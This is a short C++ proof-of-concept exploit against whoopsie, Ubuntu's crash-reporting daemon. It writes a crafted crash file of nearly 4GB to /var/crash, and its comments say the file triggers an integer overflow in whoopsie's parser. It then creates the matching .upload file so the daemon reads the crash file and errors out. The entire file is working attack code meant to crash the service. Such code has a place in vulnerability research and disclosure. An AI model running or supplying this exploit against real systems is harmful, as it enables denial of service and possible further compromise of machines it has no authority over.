#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <string>
#include <iostream>
#include "utils.hpp"

int main() {
  try {
    AutoCloseFD crash_fd(
      create_file(
        AT_FDCWD, "/var/crash/killwhoopsie.crash", S_IRWXU | S_IRWXG | S_IRWXO
      )
    );

    // Create a value just under 4GB in size.
    write_or_throw(crash_fd.get(), "x: ", 3);
    write_repeated_buffer(crash_fd.get(), "kevwozere", 9, 0x100000000ULL - 16);
    // Increase the size of the value by continuing on the next line.
    // This causes an integer overflow here:
    // http://bazaar.launchpad.net/~daisy-pluckers/whoopsie/trunk/view/698/src/whoopsie.c#L425
    write_or_throw(crash_fd.get(), "\n ", 2);
    write_repeated_buffer(crash_fd.get(), "y", 1, 20);
    write_or_throw(crash_fd.get(), "\n", 1);

    // Invalid sequence so that whoopsie will error out.
    write_or_throw(crash_fd.get(), "y:\n\n", 4);

    // whoopsie doesn't start reading the `.crash` file until we create the
    // corresponding `.upload` file.
    AutoCloseFD upload_fd(
      create_file(
        AT_FDCWD, "/var/crash/killwhoopsie.upload", S_IRWXU | S_IRWXG | S_IRWXO
      )
    );
  } catch (ErrorWithErrno& e) {
    int err = e.getErrno();
    std::cerr << e.what() << "\n" << strerror(err) << "\n";
    exit(EXIT_FAILURE);
  } catch (std::exception& e) {
    std::cerr << e.what() << "\n";
    exit(EXIT_FAILURE);
  }

  exit(EXIT_SUCCESS);
}
